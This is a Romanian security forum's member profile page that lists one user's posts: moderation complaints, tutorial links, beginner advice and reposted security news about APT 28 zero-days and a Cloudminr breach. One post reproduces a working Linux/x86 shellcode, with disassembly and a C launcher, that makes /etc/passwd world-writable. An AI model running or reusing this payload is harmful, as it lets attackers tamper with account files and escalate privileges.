Jump to content

fan_em

Members
  • Posts

    43
  • Joined

  • Last visited

About fan_em

  • Birthday 04/02/1999

Converted

  • Location
    ก้้้้้้้้้้้้้้้้้้้ก้้้้้้้้้้้้

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

fan_em's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Nu vrea em s? îmi raspund? la PM, poate public o s? fie mai u?or de g?sit. Bre @em, dac? tot te deranjez cu asta, spune-mi te rog de ce mi-ai dat ban pe chat? ai zis tu c? te pi?i pe familia mea, dar acum chiar la cheremul lui reckon e?ti?
  2. Graffik a fost banat pentru c? se ocupa cu carduri înafara forumului, reckon de ce nu este banat? Majoritatea de pe forum ?tiu cu ce se ocupa. @Reckon stiu, reckon doar le vinde, nu se atinge de ele + face scamuri in php pe 50$
  3. https://rstforums.com/forum/79187-rst-tutorial-complet-regex.rst https://rstforums.com/forum/87888-rst-tutorial-stack-based-buffer-overflow.rst https://rstforums.com/forum/82999-tutorial-securizare-kernel-sistem-linux-cu-selinux.rst https://rstforums.com/forum/80447-tutorial-optimizare-apache-server-varianta-debian-ubuntu.rst https://rstforums.com/forum/47076-http-load-balancing.rst iar cel mai recent: https://rstforums.com/forum/103977-bookmarks-de-pe-rst.rst
  4. Pentru mario po?i s? folose?ti orice distribu?ie, instalezi wine dup? te descurci tu. OS = sistem de operare b.t.w Acest matriux este o distribu?ie care se bazeaz? pe alta distribu?ie ?i care vine cu o suit? de programe preinstalate. De astea te-am întrebat de ce vrei s? îl instalezi. E?ti sigur c? ai nevoie de o distribu?ie ca s? fii hacker? Înva?? programare, dac? nu, domeniul securit??ii nu e de tine.
  5. Nu cred c? mi-ai r?spuns la întrebare.
  6. Pentru ce ai nevoie ? Nu cred c? cineva poate s? î?i recomande orice dac? nu spui la ce î?i trebuie .
  7. fan_em

    sal

    Salut, Rst-ul este un loc bun dac? vrei s? începi s? înve?i mai multe în domeniul securit??ii ?i al program?rii. Vreau s? te previn în leg?tur? cu trolleri, flameri ?i Aero?oli (pe cât posibili s? îi eviti sau s? nu îi bagi în seama). Dac? ai nevoie de ajutor este o sec?iune special pentru a?a ceva pe forum. Î?i recomand s? începi cu programarea, nu conteaza limbajul. ?ine minte, pân? ?i c?utatul despre un anumit subiect te ajut? la înva?at. P.S: s? folose?ti sec?iunea de ajutor doar când nu ai g?sit nimic care s? te ajute pe Google. Bine ai venit ! De unde ?tii tu cu ce se ocupa aceast? comunitate? e?ti cumva din staff sau de ce vorbe?ti în numele comunit??ii? Tu nu ai dreptul de a da sfaturi, deoarece:
  8. An APT group thought to be tied to Russia is flying against conventional wisdom, having as recently as the last three weeks dropped its sixth zero-day in the past four months. Given the underground value of unpatched and unreported vulnerabilities, this is highly unusual behavior, even for a state-sponsored cyberespionage team. This week alone, two zero-days attributed to this team disappeared when they were patched by Microsoft and Oracle in Office and Java respectively. Researchers at iSight Partners reported the Office zero-day to Microsoft on June 30 and it was patched on Tuesday in MS15-070, an Office security bulletin that patched 13 other vulnerabilities in the software. Later that night, Oracle erased a Java zero-day in its quarterly Critical Patch Update that was used against a U.S.-based defense contractor and foreign military outfits. It was the first Java zero day actively exploited in the wild since 2013, experts said. APT 28 keeps a vast arsenal of malware and domains under its control, according to researchers Brian Bartholomew and Jonathan Leathery of iSight. “This indicates it’s not a handful of guys; this is an organization managing this stuff,” Bartholomew said, adding that the group has also been known to use cryptocurrency such as Bitcoin to buy domains in order to hide registration information and remain anonymous. “It’s hard to manage that much infrastructure that they own.” Five of the half-dozen zero days, Bartholomew said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. “They actually rewrote it, which is interesting. It’s not just a copy of the [Hacking Team] proof of concept with their own shell code added,” Bartholomew said. The Office zero day, CVE-2015-2424, was likely still under development since iSight researchers said it was still fairly buggy and unreliable. It was likely spread via spear phishing emails, specifically targeting individuals or groups within sensitive organizations. The lure found by iSight was a Word document purporting to be an analysis of the Iran nuclear deal. “It’s a heap corruption vulnerability in Office where it’s mishandling an object in memory, which allowed for remote code execution from the weaponized document,” Leathery said, adding that the message also included a CNN article on the Iran deal published June 28. The likely targets were the former Soviet republic of Georgia. The payload is a variant of the Sofacy or Sednit Trojan, which immediately opens a backdoor to a number of attacker-controlled domains where stolen data is sent. Some of the domains, iSight said, are benign or do not belong to the APT group, a false-flag of sorts. The targets are government agencies in Eastern Europe or NATO, along with critical industries such as nuclear, telecommunications, defense industrial base and diplomatic interests. The group is not only adept at gathering intelligence from foreign interests, but also focuses on internal dissidents and threats to national security in Russia, iSight said. One counter-terrorism operation attributed to this group is the so-called Cyber Caliphate hacktivist operation, where hackers posing as ISIS supporters set up lures via social media or forums trying to attract those sympathetic to the Islamic State. Once some confidence is established with a target via direct messaging, APT 28 would entice them to install an application that was malicious and allowed them to monitor the dissidents’ activities. Despite the fact that this particular Office—and Java—zero day has been patched, iSight believes APT 28 is well resourced and has more at its disposal. “This throws a wrench in their plans; usually they can get a few months out of a zero day before a patch is out,” Bartholomew said. “It’s unprecedented using this many zero days, but at the same time, they have access to developers who can build these or have the resources to buy them.” - See more at: https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825#sthash.YCV7Ync8.dpuf
  9. /* # Title: Linux/x86 chmod('/etc/passwd',0777) - shellcode 42 bytes # Platform: linux/x86_64 # Author: Mohammad Reza Espargham # Linkedin : [url]https://ir.linkedin.com/in/rezasp[/url] # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : [url=http://www.reza.es]HOME.[/url] # Twitter : [url]https://twitter.com/rezesp[/url] # FaceBook : [url]https://www.facebook.com/mohammadreza.espargham[/url] Disassembly of section .text: 00000000 <.text>: 0: 6a 0f push $0xf 2: 58 pop %eax 3: 68 90 90 ff 01 push $0x1ff9090 8: 59 pop %ecx 9: c1 e9 10 shr $0x10,%ecx c: 68 90 73 77 64 push $0x64777390 11: 5b pop %ebx 12: c1 eb 08 shr $0x8,%ebx 15: 53 push %ebx 16: 68 2f 70 61 73 push $0x7361702f 1b: 68 2f 65 74 63 push $0x6374652f 20: 89 e3 mov %esp,%ebx 22: cd 80 int $0x80 24: b0 01 mov $0x1,%al 26: b3 01 mov $0x1,%bl 28: cd 80 int $0x80 */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x6a\x0f\x58\x68\x90\x90\xff\x01\x59\xc1\xe9\x10\x68\x90\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\xcd\x80\xb0\x01\xb3\x01\xcd\x80"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  10. Cel mai ok ar fi s? po?i selecta ce update-uri vrei, ca ?i în versiunile anterioare...
  11. Windows 10 is all set to launch on July 29 and will also be available on USB drives for purchase in retail channels. So, if you are planning to install Windows 10 Home, one thing you must keep in your mind – You wish or not, the software updates for Microsoft’s new operating system will be mandatory. Microsoft is planning to make a significant change to its software update policy by "removing the option to DISABLE software updates in Windows 10 Home". This clearly indicates that all users of Windows operating system must agree to allow Microsoft to install software updates automatically. In Windows 8.1, users get four options for Windows Update's behavior, which include: Download and Install Windows Updates Automatically Download Windows Updates automatically but Choose when to Install them Check for Updates but Choose when to Download and Install them Never check for, Download, or Install Updates From a Security point of view, the last option, i.e. never to download or install updates, is not at all recommended by either the company or the security experts. However, the option is still there if Windows users really need it. In Windows 10, the options for Windows Update are cut to only two, which include: Check, Download, Install, and Reboot automatically Check, Download, Install automatically and then choose to Reboot Here is the EULA to which you agree to when you accept the terms of the licensing agreement: If this happens with the launch of Windows 10, it would be a notable change in any version of Windows OS as Microsoft has talked about Windows 10's Windows-as-a-Service approach that will receive continuous updates. Every software program needs frequent updates, but the ability of Windows users to permanently delay Windows software updates has made it difficult for Microsoft to keep its OS platform secure and up-to-date. And the only motive behind this change is to maintain the security of its users safe.
  12. Bitcoin Cloud Mining service Cloudminr.io has been hacked and its whole users database is on sale for 1 Bitcoin. The unknown hackers have successfully taken full control of the website's server and defaced the homepage of the website. Users visiting the website are greeted with a defaced homepage showing the partial database of around 1000 clients including their usernames and unencrypted passwords in completely plain text format. This clearly indicates that the company is not following the best security practices to secure their users private data as the passwords were not even hashed before storing into the database. Hackers offering around 80,000 users database for 1BTC The database of 1000 users shown on the website homepage is just a sample given by the hackers while they have compromised around 80,000 users database in total from the cloud mining service. The hackers are offering the entire database of thousands of users for the just 1BTC, which could be a goldmine for cyber-criminals and spammers. So far, there is not any details on whether Bitcoin wallets or simply parts of the website server were compromised. However, users of Cloudminr.io are recommended to change their passwords at any other service that uses the same combination of username and password as their Cloudminr account.
  13. Aerosol drag?, noi suntem u?or dezam?gi?i de tutorialul t?u, ai cuno?tin?e gârl? ?i tu ne prezinti a?a ceva. ?tim cu to?i de ce e?ti în stare ?i te rog s? nu te rezumi doar la tutoriale de prin anul 2001.
  14. Ar trebui sa incerci din mai multe surse, nu te baza doar pe aplicatia asta. De dat roade depinde de persoana la persoana, depinde cat iti dai silininta..
×
×
  • Create New...